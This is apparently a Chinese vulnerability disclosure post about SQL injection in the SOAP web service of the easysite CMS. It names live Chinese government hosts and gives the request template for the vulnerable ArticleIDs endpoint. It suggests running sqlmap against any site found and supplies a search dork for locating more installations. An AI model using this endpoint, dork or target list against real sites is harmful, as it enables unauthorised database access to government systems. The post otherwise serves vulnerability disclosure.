easysite内容管理系统某简单粗暴的SQL注入

### 简要描述： web services是不会骗人的~！ 大量gov站点采用了easysite内容管理系统。 ### 详细说明： 1.soap注入 easysite webservice 文件： ``` http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx ``` [<img src="https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png" alt="soap.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png) 2.ArticleIDs参数存在SQL注入漏洞 [<img src="https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png" alt="sql1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png) [<img src="https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png" alt="SQL2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png) 随便找个放sqlmap里跑吧 ``` POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1 Host: dynamic.xmedu.gov.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetArticleHitsArray" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetArticleHitsArray xmlns="http://tempuri.org/"> <ArticleIDs>string</ArticleIDs> </GetArticleHitsArray> </soap:Body> </soap:Envelope> ``` [<img src="https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png" alt="sql3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png) ### 漏洞证明： 如果你不知道谁在用easysite，那就google（If you can open it）下把： inurl:asmx DesktopModules （海关总署N个域名都是这套系统）